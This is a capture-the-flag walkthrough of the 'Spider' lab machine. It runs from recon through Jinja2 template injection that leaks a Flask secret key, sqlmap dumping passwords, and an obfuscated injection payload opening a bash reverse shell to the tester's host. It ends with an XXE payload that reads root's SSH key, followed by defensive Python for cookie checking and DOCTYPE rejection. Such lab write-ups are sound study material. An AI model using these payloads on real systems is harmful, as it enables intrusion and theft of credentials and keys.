Spider

$ sudo nmap -p- -T4 -A 10.10.10.243
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 28:f1:61:28:01:63:29:6d:c5:03:6d:a9:f0:b0:66:61 (RSA)
|   256 3a:15:8c:cc:66:f4:9d:cb:ed:8a:1f:f9:d7:ab:d1:cc (ECDSA)
|_  256 a6:d4:0c:8e:5b:aa:3f:93:74:d6:a8:08:c9:52:39:09 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://spider.htb/
$ echo 10.10.10.243 spider.htb | sudo tee -a /etc/hosts
$ dirb http://spider.htb
---- Scanning URL: http://spider.htb/ ----
+ http://spider.htb/cart (CODE:500|SIZE:290)
+ http://spider.htb/checkout (CODE:500|SIZE:290)
+ http://spider.htb/index (CODE:500|SIZE:290)
+ http://spider.htb/login (CODE:200|SIZE:1832)
+ http://spider.htb/logout (CODE:302|SIZE:209)
+ http://spider.htb/main (CODE:500|SIZE:290)
+ http://spider.htb/register (CODE:200|SIZE:2130)
+ http://spider.htb/user (CODE:302|SIZE:219)
+ http://spider.htb/view (CODE:302|SIZE:219)
$ nikto -h http://spider.htb
+ Server: nginx/1.14.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /static/img/core-img/favicon.ico, inode: 1587179459.0, size: 1045, mtime: 2784498078
+ Allowed HTTP Methods: HEAD, OPTIONS, POST, GET 
Registering a user named {{7*7}} renders as 49, so the template engine is Jinja2 (Flask).
Registering the user {{config}} dumps the application config:

<Config {'ENV': 'production', 'DEBUG': False, 'TESTING': False, 'PROPAGATE_EXCEPTIONS': None, 'PRESERVE_CONTEXT_ON_EXCEPTION': None, 'SECRET_KEY': 'Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942', 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(31), 'USE_X_SENDFILE': False, 'SERVER_NAME': None, 'APPLICATION_ROOT': '/', 'SESSION_COOKIE_NAME': 'session', 'SESSION_COOKIE_DOMAIN': False, 'SESSION_COOKIE_PATH': None, 'SESSION_COOKIE_HTTPONLY': True, 'SESSION_COOKIE_SECURE': False, 'SESSION_COOKIE_SAMESITE': None, 'SESSION_REFRESH_EACH_REQUEST': True, 'MAX_CONTENT_LENGTH': None, 'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(0, 43200), 'TRAP_BAD_REQUEST_ERRORS': None, 'TRAP_HTTP_EXCEPTIONS': False, 'EXPLAIN_TEMPLATE_LOADING': False, 'PREFERRED_URL_SCHEME': 'http', 'JSON_AS_ASCII': True, 'JSON_SORT_KEYS': True, 'JSONIFY_PRETTYPRINT_REGULAR': False, 'JSONIFY_MIMETYPE': 'application/json', 'TEMPLATES_AUTO_RELOAD': None, 'MAX_COOKIE_SIZE': 4093, 'RATELIMIT_ENABLED': True, 'RATELIMIT_DEFAULTS_PER_METHOD': False, 'RATELIMIT_SWALLOW_ERRORS': False, 'RATELIMIT_HEADERS_ENABLED': False, 'RATELIMIT_STORAGE_URL': 'memory://', 'RATELIMIT_STRATEGY': 'fixed-window', 'RATELIMIT_HEADER_RESET': 'X-RateLimit-Reset', 'RATELIMIT_HEADER_REMAINING': 'X-RateLimit-Remaining', 'RATELIMIT_HEADER_LIMIT': 'X-RateLimit-Limit', 'RATELIMIT_HEADER_RETRY_AFTER': 'Retry-After', 'UPLOAD_FOLDER': 'static/uploads'}>

SSTI (Server-Side Template Injection)
$ sqlmap http://spider.htb/ --eval "from flask_unsign import session as s; session = s.sign({'uuid': session}, secret='Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942')" --cookie="session=*" --delay 1 --dump
Answer "Y" to sqlmap's first prompt and "n" to the next.
Database: shop
Table: users
[4 entries]
+----+--------------------------------------+------------+-----------------+
| id | uuid                                 | name       | password        |
+----+--------------------------------------+------------+-----------------+
| 1  | 129f60ea-30cf-4065-afb9-6be45ad38b73 | chiv       | ch1VW4sHERE7331 |
| 2  | 1bf26b09-81c8-4888-9c13-8abbdc851735 | cpt        | Cyber!23        |
| 3  | b8ba2786-c628-4274-b296-3b1341113881 | {{7*7}}    | 123             |
| 4  | 13c7e709-0099-4718-9fd0-ad9f238b7886 | {{config}} | 123             |
+----+--------------------------------------+------------+-----------------+
Log in as chiv / ch1VW4sHERE7331.

Server Side Template Injection Payloads
http://spider.htb/a1836bb97e5f4ce6b3e8f25693c1a16c.unfinished.supportportal

$ nc -lvnp 4444

$ echo 'bash -i  >&/dev/tcp/10.10.14.42/4444 0>&1' | base64
YmFzaCAtaSAgPiYvZGV2L3RjcC8xMC4xMC4xNC40Mi80NDQ0IDA+JjEK

Submit a support ticket with this payload in both the "Contact number or email" field and the message field:
{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSAgPiYvZGV2L3RjcC8xMC4xMC4xNC40Mi80NDQ0IDA+JjEK | base64 -d | bash")["read"]() %} a {% endwith %}

kali@kali:~/0.htb/machines/Spider243$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.42] from (UNKNOWN) [10.10.10.243] 43100
bash: cannot set terminal process group (1405): Inappropriate ioctl for device
bash: no job control in this shell
chiv@spider:/var/www/webapp$ 
chiv@spider:~$ cat user.txt

95cc06074261936b2593904ebdca9ae4
chiv@spider:~$ 

chiv@spider:~/.ssh$ cat id_rsa
Save the key locally as id_chiv:
-rw-r--r-- 1 kali kali  1678 Jun 19 08:02 id_chiv
kali@kali:~/0.htb/machines/Spider243$ chmod 600 id_chiv 
kali@kali:~/0.htb/machines/Spider243$ 
kali@kali:~/0.htb/machines/Spider243$ ssh -i id_chiv chiv@spider.htb
The authenticity of host 'spider.htb (10.10.10.243)' can't be established.
ECDSA key fingerprint is SHA256:Z0c/GTs+BeZXyXf2c/kRC1Y+omqtI1wPaEfrz0vvYCM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'spider.htb,10.10.10.243' (ECDSA) to the list of known hosts.
Last login: Sat Jun 19 02:45:30 2021 from 10.10.14.200
chiv@spider:~$ 
chiv@spider:~$ ss -lntup
Netid            State              Recv-Q             Send-Q                          Local Address:Port                           Peer Address:Port             
udp              UNCONN             0                  0                               127.0.0.53%lo:53                                  0.0.0.0:*                
tcp              LISTEN             0                  128                                   0.0.0.0:80                                  0.0.0.0:*                
tcp              LISTEN             0                  100                                 127.0.0.1:8080                                0.0.0.0:*                
tcp              LISTEN             0                  128                             127.0.0.53%lo:53                                  0.0.0.0:*                
tcp              LISTEN             0                  128                                   0.0.0.0:22                                  0.0.0.0:*                
tcp              LISTEN             0                  80                                  127.0.0.1:3306                                0.0.0.0:*                
tcp              LISTEN             0                  128                                      [::]:22                                     [::]:*                
chiv@spider:~$ 
Port 8080 listens only on localhost, so forward it over SSH:
kali@kali:~/0.htb/machines/Spider243$ ssh -i id_chiv -L 9090:localhost:8080 chiv@spider.htb
Last login: Sat Jun 19 12:18:20 2021 from 10.10.14.42
chiv@spider:~$ 
http://127.0.0.1:9090/login
http://127.0.0.1:9090/site

The session cookie from the forwarded site:
.eJw1jE1PwyAAhv-K4eyB1u3SZJcOaO2ECuWj42aDCa3Q1clhbtl_d9N4fPM8z3sB4RQDKC7gYQAFUJgRh0-SfzRamDTrmJl3Q7-H2o5viqxktZROZYj3gmokXhT2Oxefz6pL6MbnTrGyJUstptLe-X1bGBA3ruEQryzx7VCxxIwfdaaORrItJSVqJZlosOt9zCpHFsVwuvl_f7-99N7gdTTada4iPdsmJmqX77VvbQi9moXXZ37kefj3KQ3NwWJHdpB9uic7DTLkFnP4yjcbcH0Ey2Gc0xco4PUHZSxU-g.YM3tag.9znDEGz_FSEgnHvDoV_osG0GGsE

Decode it with flask-unsign (the payload is only signed, not encrypted, so no key is needed to read it):
kali@kali:~/0.htb/machines/Spider243$ flask-unsign --decode --cookie .eJw1jE1PwyAAhv-K4eyB1u3SZJcOaO2ECuWj42aDCa3Q1clhbtl_d9N4fPM8z3sB4RQDKC7gYQAFUJgRh0-SfzRamDTrmJl3Q7-H2o5viqxktZROZYj3gmokXhT2Oxefz6pL6MbnTrGyJUstptLe-X1bGBA3ruEQryzx7VCxxIwfdaaORrItJSVqJZlosOt9zCpHFsVwuvl_f7-99N7gdTTada4iPdsmJmqX77VvbQi9moXXZ37kefj3KQ3NwWJHdpB9uic7DTLkFnP4yjcbcH0Ey2Gc0xco4PUHZSxU-g.YM3tag.9znDEGz_FSEgnHvDoV_osG0GGsE
{'lxml': b'PCEtLSBBUEkgVmVyc2lvbiAxLjAuMCAtLT4KPHJvb3Q+CiAgICA8ZGF0YT4KICAgICAgICA8dXNlcm5hbWU+Y3B0PC91c2VybmFtZT4KICAgICAgICA8aXNfYWRtaW4+MDwvaXNfYWRtaW4+CiAgICA8L2RhdGE+Cjwvcm9vdD4=', 'points': 0}
kali@kali:~/0.htb/machines/Spider243$ 
kali@kali:~/0.htb/machines/Spider243$ echo -n PCEtLSBBUEkgVmVyc2lvbiAxLjAuMCAtLT4KPHJvb3Q+CiAgICA8ZGF0YT4KICAgICAgICA8dXNlcm5hbWU+Y3B0PC91c2VybmFtZT4KICAgICAgICA8aXNfYWRtaW4+MDwvaXNfYWRtaW4+CiAgICA8L2Rh | base64 -d
<!-- API Version 1.0.0 -->
<root>
    <data>
        <username>cpt</username>
        <is_admin>0</is_admin>
    </da
kali@kali:~/0.htb/machines/Spider243$ 
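
As an added example (not the writeup's code), a standard-library verifier and decoder for this cookie format: the payload is readable by anyone, and only the HMAC check depends on SECRET_KEY, which is why a key leaked through {{config}} must be rotated. SALT is the salt Flask itself uses for session cookies; COOKIE is the one captured above.

```python
import base64
import hashlib
import hmac
import json
import zlib

# Key leaked by the {{config}} injection above, and the salt Flask's
# SecureCookieSessionInterface passes to itsdangerous for session cookies.
SECRET_KEY = b"Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942"
SALT = b"cookie-session"

# The cookie captured from the forwarded port-8080 site above.
COOKIE = (".eJw1jE1PwyAAhv-K4eyB1u3SZJcOaO2ECuWj42aDCa3Q1clhbtl_d9N4fPM8z3sB4RQDKC7gYQAFUJgRh0-SfzRamDTrmJl3Q7-H2o5viqxktZROZYj3gmokXhT2Oxefz6pL6MbnTrGyJUstptLe-X1bGBA3ruEQryzx7VCxxIwfdaaORrItJSVqJZlosOt9zCpHFsVwuvl_f7-99N7gdTTada4iPdsmJmqX77VvbQi9moXXZ37kefj3KQ3NwWJHdpB9uic7DTLkFnP4yjcbcH0Ey2Gc0xco4PUHZSxU-g.YM3tag.9znDEGz_FSEgnHvDoV_osG0GGsE")


def _b64decode(s: str) -> bytes:
    """URL-safe base64 without padding, as itsdangerous emits it."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def verify_session(cookie: str, secret_key: bytes) -> bool:
    """Recompute the itsdangerous signature: HMAC-SHA1 over 'payload.timestamp', keyed with HMAC-SHA1(secret, salt)."""
    payload, timestamp, signature = cookie.rsplit(".", 2)
    derived = hmac.new(secret_key, SALT, hashlib.sha1).digest()
    expected = hmac.new(derived, f"{payload}.{timestamp}".encode(), hashlib.sha1).digest()
    return hmac.compare_digest(expected, _b64decode(signature))


def _untag(obj: dict):
    """Undo Flask's tagged JSON for the one tag this cookie uses: {" b": base64} -> bytes."""
    if len(obj) == 1 and " b" in obj:
        return base64.b64decode(obj[" b"])
    return obj


def decode_session(cookie: str) -> dict:
    """Read the payload without any key: a leading '.' marks a zlib-compressed body."""
    payload = cookie.rsplit(".", 2)[0]
    raw = _b64decode(payload.lstrip("."))
    if payload.startswith("."):
        raw = zlib.decompress(raw)
    return json.loads(raw, object_hook=_untag)


def session_xml(cookie: str) -> bytes:
    """The XML document the portal stores base64-encoded in the 'lxml' field."""
    return base64.b64decode(decode_session(cookie)["lxml"])
```

The page does not show whether the port-8080 app shares the shop's SECRET_KEY, so verify_session(COOKIE, SECRET_KEY) may legitimately return False here; a cookie whose payload or timestamp has been altered always does.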

XXE (XML External Entity Injection)
XXE Cheatsheet – XML External Entity Injection
In Burp Suite, send the form with these parameters (the version value breaks out of the API-version comment to declare the entity):
username=%26username%3b&version=1.0.0--><!DOCTYPE+foo+[<!ENTITY+username+SYSTEM+"/root/.ssh/id_rsa">+]><!--
We get root's id_rsa; save it as id_root.
kali@kali:~/0.htb/machines/Spider243$ chmod 600 id_root
kali@kali:~/0.htb/machines/Spider243$ ll
total 28
-rw------- 1 kali kali 1678 Jun 19 08:02 id_chiv
-rw------- 1 kali kali 1674 Jun 19 08:27 id_root
kali@kali:~/0.htb/machines/Spider243$ ssh -i id_root root@spider.htb
Last login: Sat Jun 19 04:00:57 2021 from 10.10.14.200
root@spider:~# ls -l
total 4
-r-------- 1 root root 33 Jun 19 00:55 root.txt
root@spider:~# cat root.txt
e4da9db40f53a4e53a14e61add99940c
root@spider:~#
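
The portal keeps a client-controlled XML document in its own session cookie (the field is named lxml, so an entity-resolving parser is assumed), which is where the DOCTYPE above lands. As an added example that is not the box's code, a standard-library parse of that document which refuses any DOCTYPE or entity declaration before the real parse runs; the hostile sample is constructed with a placeholder path.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class UnsafeXML(ValueError):
    """The document declares a DOCTYPE or an entity; this API never needs either."""


def reject_doctype(xml_bytes: bytes) -> None:
    """First pass with expat: abort as soon as a DOCTYPE or any entity declaration appears."""
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE for <{name}> refused (system id: {sysid})")

    def on_entity(*_):
        raise UnsafeXML("entity declaration refused")

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(xml_bytes, True)


def parse_session_xml(xml_bytes: bytes) -> dict:
    """Return the children of <root><data> as a dict, or raise UnsafeXML."""
    reject_doctype(xml_bytes)  # lxml users: also XMLParser(resolve_entities=False, no_network=True)
    data = ET.fromstring(xml_bytes).find("data")
    if data is None:
        raise UnsafeXML("missing <data> element")
    return {child.tag: (child.text or "") for child in data}


def is_safe_session_xml(xml_bytes: bytes) -> bool:
    """Request-filter form of the check: True only if the document parses without any declaration."""
    try:
        parse_session_xml(xml_bytes)
        return True
    except (UnsafeXML, ET.ParseError, xml.parsers.expat.ExpatError):
        return False


# Benign: the document decoded from the captured cookie above.
BENIGN = b"""<!-- API Version 1.0.0 -->
<root>
    <data>
        <username>cpt</username>
        <is_admin>0</is_admin>
    </data>
</root>"""

# Constructed: the same document with a DOCTYPE declaring an external entity (placeholder path).
HOSTILE = (b'<!-- API Version 1.0.0 -->\n<!DOCTYPE root [<!ENTITY username SYSTEM "file:///PLACEHOLDER/secret">]>\n'
           b"<root><data><username>&username;</username><is_admin>0</is_admin></data></root>")
```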
